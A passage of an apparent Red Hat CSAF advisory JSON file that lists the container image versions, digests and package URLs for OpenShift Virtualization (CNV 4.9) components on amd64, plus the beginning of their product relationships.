"purl": "pkg:oci/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64",
"product": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64",
"product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.9.6-5"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64",
"product": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64",
"product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64",
"product": {
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64",
"product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-must-gather-rhel8@sha256:2d9ad446a2c7a26520b2a280580d39d02d96160d58b769c8832f31ebb9c9b51f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.9.6-7"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64",
"product": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64",
"product_id": "container-native-virtualization/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hco-bundle-registry@sha256:923fa16632843dd65fa4b4312c737eaf999ae44fb9b8c72016c8c65ce531385b?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.9.6-51"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:efe2190ed6477fa289187de61064054290a984601a40bc7a7aaa714ceef41e90?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:5e348c3ca2ec93f22cdf246c3b9293fbba1ac2ef4b8a286c516971e4741a23bc?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-operator@sha256:2fd2bc99e04dde37b46a438ba881a81e0c558dcbd19681a1b927e0647dced419?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:56dec5123de6a1e09813a39e22294eb1b1ed4c00a11c0c2719b20cf944be3d3a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64",
"product": {
"name": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64",
"product_id": "container-native-virtualization/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubemacpool@sha256:48afb12b1adddf71f98a30960f0a06a6a8920d2fb8aa521af482eb60efd086f6?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64",
"product": {
"name": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64",
"product_id": "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:eff6902a5ae27ea85ea75a0842cb45e106285eb02456f34c377f16ad8752d8e3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8\u0026tag=v4.9.6-5"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64",
"product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-ssp-operator@sha256:a6882fad978b6df2abe21bd6b67987fdcedb767487dfd980c40d465680ebb85e?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.9.6-5"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64",
"product_id": "container-native-virtualization/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-template-validator@sha256:99005cdab8cd6ec64fa0b5074191f859b55519b9c24a06f764919d5dd655cda3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-template-validator\u0026tag=v4.9.6-6"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64",
"product_id": "container-native-virtualization/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-v2v-conversion@sha256:96126128d66f8b390c5b135e404c75bd06a9fa4c8f637dc991a2358e63393a3b?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64",
"product_id": "container-native-virtualization/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-vmware@sha256:b5cfc061df65f6ee82fb792b063166be21426422093a8b99845329fd243f77ba?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64",
"product": {
"name": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64",
"product_id": "container-native-virtualization/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44_amd64",
"product_identification_helper": {
"purl": "pkg:oci/libguestfs-tools@sha256:51f80ce494533681efe96d9c7ef0f3aca2cf3c4a919469eab6aef6c1d74a8c44?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/libguestfs-tools\u0026tag=v4.9.6-9"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64",
"product": {
"name": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64",
"product_id": "container-native-virtualization/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/node-maintenance-operator@sha256:ec2319366b7125b96f99a6bc2b55e4f288aabb1f7474ced9a5bac092677b1bcc?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64",
"product_id": "container-native-virtualization/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-marker@sha256:c119b9d4be1b885ab6cd1da5a9cddc862549060f9321a3d9f1f4daa0b7ff24ff?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-marker\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64",
"product": {
"name": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64",
"product_id": "container-native-virtualization/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ovs-cni-plugin@sha256:b93deb2d624cb2289e3b558fa07b91c26bf674559243faa82f0f69e83347fcad?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/ovs-cni-plugin\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64",
"product": {
"name": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64",
"product_id": "container-native-virtualization/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-api@sha256:0252b6f9b2052977775cfebedf4e16cddf4484e00969180ac14da9de7b1af6e1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-api\u0026tag=v4.9.6-9"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64",
"product": {
"name": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64",
"product_id": "container-native-virtualization/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-artifacts-server@sha256:446462f4f1500f8ea8837721e26c8b8bbd36aea5eed6c09546f15ad314fd0f1e?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-artifacts-server\u0026tag=v4.9.6-9"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64",
"product_id": "container-native-virtualization/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-apiserver@sha256:ee809f60e35767b1755955761e16ffeaff6025d07ed73fc9ea6b66cf064177f6?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-apiserver\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64",
"product_id": "container-native-virtualization/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-cloner@sha256:a25b6cd4be57511338a414e1a5247745e1a7b3beb528945c9389eec473d57a19?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-cloner\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64",
"product_id": "container-native-virtualization/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-controller@sha256:4a6d2ca39c487e317c6a88f3ab30ad94b56ec996da82f0ca85b202334df46770?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-controller\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64",
"product_id": "container-native-virtualization/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-importer@sha256:b842957a75980e747916d3d83651c5bbb45b3d6bc81e28c2455cd783f7e768aa?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-importer\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64",
"product_id": "container-native-virtualization/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-operator@sha256:77fe54aacce1789c4619b645ea5a9f9cc353f2e18db438aa785cd60065852071?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-operator\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadproxy@sha256:def07c859fccb197606115700a6da314c786ece914ed4907dafe54ba94427e8a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadproxy\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64",
"product": {
"name": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64",
"product_id": "container-native-virtualization/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-cdi-uploadserver@sha256:a2458bf4fabb6950f22c61f8fd3f34222d9fdbbd5cedf3c7852dcb87a145df7f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-cdi-uploadserver\u0026tag=v4.9.6-4"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64",
"product": {
"name": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64",
"product_id": "container-native-virtualization/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-controller@sha256:18fc5a4b5fe3d5d0a144ca4d9f51ac9c445025ab4d2d0a3f0a4996f5ac58d725?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-controller\u0026tag=v4.9.6-9"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64",
"product": {
"name": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64",
"product_id": "container-native-virtualization/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-handler@sha256:348d1c698ad05dc4d39548b4b79fa9643e15c507acfffdd41772830dac9c0e4c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-handler\u0026tag=v4.9.6-9"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64",
"product": {
"name": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64",
"product_id": "container-native-virtualization/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virtio-win@sha256:d61b757b9fa3e2fe3f3fc545912bdb21209f331027f363c4a0a4f57b880363e3?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virtio-win\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64",
"product": {
"name": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64",
"product_id": "container-native-virtualization/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-launcher@sha256:182d9a84f3aa15aedd1305b025997b115baf535b1334d5fabc2f7d34ca53613d?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-launcher\u0026tag=v4.9.6-9"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64",
"product": {
"name": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64",
"product_id": "container-native-virtualization/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570_amd64",
"product_identification_helper": {
"purl": "pkg:oci/virt-operator@sha256:98e85fbcb207fada1ead3da157aba01ffbd7ed4773701e7e113c1d21849e8570?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/virt-operator\u0026tag=v4.9.6-9"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64",
"product": {
"name": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64",
"product_id": "container-native-virtualization/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-import-controller-rhel8@sha256:b8e15d5243e5f89877dbd320df3515163c288e16232b9ef1fb8719bd122ff16f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64",
"product": {
"name": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64",
"product_id": "container-native-virtualization/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-import-operator-rhel8@sha256:d55219af6e3d6962fc59de4f6f11eed7d0205bbe36d6ba7f03c74eba0881373f?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8\u0026tag=v4.9.6-3"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64",
"product": {
"name": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64",
"product_id": "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/vm-import-virtv2v-rhel8@sha256:8276c4ea2a2f487ce7dfb8469061efd4a9834fde8e9a58e4b43781c09d49d87c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8\u0026tag=v4.9.6-3"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64"
},
"product_reference": "container-native-virtualization/bridge-marker@sha256:e1d3caa39c5392fe57f7e4308c9957248559457e61daf87a0e66d998e658dc97_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64"
},
"product_reference": "container-native-virtualization/cluster-network-addons-operator@sha256:9e07f1ab0e89ed31a4bc7546664fa8ea6ed5a5c78f5e71205892fd64c83d3727_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64 as a component of CNV 4.9 for RHEL 8",
"product_id": "8Base-CNV-4.9:container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64"
},
"product_reference": "container-native-virtualization/cnv-containernetworking-plugins@sha256:64a1b3efe2bf641c746050d65e7e4bd812111537c05710a45029b25f069160d3_amd64",
"relates_to_product_reference": "8Base-CNV-4.9"
},
{
"category": "default_component_of",
"full_product_name": {
